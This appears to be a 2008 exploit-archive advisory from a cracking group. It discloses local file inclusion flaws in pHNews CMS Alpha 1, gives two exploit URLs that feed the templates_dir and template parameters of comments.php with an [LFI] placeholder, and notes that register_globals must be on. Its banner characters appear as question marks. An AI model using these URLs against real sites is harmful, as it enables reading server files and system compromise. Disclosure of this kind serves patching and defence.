[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : pHNews CMS Multiple Local File Inclusion Vulnerabilities
# Published : 2008-07-03
# Author : CraCkEr
# Previous Title : phpWebNews 0.2 MySQL Edition (det) SQL Injection Vulnerability
# Next Title : XchangeBoard 1.70 (boardID) Remote SQL Injection Vulnerability
???????????????????????????????????????????????????????????????????????????????
?? C r a C k E r ??
?? T H E C R A C K O F E T E R N A L M I G H T ??
??????????????????????????????????????????????????????????????????????????????
????? From The Ashes and Dust Rises An Unimaginable crack.... ?????
??????????????????????????????????????????????????????????????????????????????
?? [ Local File Include ] ??
??????????????????????????????????????????????????????????????????????????????
: Author : CraCkEr : : :
? Group : uNiTeD CraCkiNg ForCE ? ? ?
? Script : pHNews CMS Alpha 1 ? ? Register Globals : ?
? Download : SourceForge.net ? ? ?
? Method : GET ? ? [?] ON [ ] OFF ?
? Critical : High [????????] ? ? ?
? Impact : System access ? ? ?
? ????????????????????????????????????? ???????????????????????????????????? ?
? DALnet #crackers ??
??????????????????????????????????????????????????????????????????????????????
: :
? Release Notes: ?
? ????????????? ?
? Typically used for remotely exploitable vulnerabilities that can lead to ?
? system compromise. ?
? ?
??????????????????????????????????????????????????????????????????????????????
?? Exploit URL's ??
??????????????????????????????????????????????????????????????????????????????
http://localhost/path/modules/comments.php?templates_dir=[LFI]
http://localhost/path/modules/comments.php?template=[LFI]
??????????????????????????????????????????????????????????????????????????????
Greets:
The_PitBull, Raz0r, iNs, Sad, CwG GeNiuS
??????????????????????????????????????????????????????????????????????????????
?? ? CraCkEr 2008 ??
??????????????????????????????????????????????????????????????????????????????
# www.Syue.com [2008-07-03]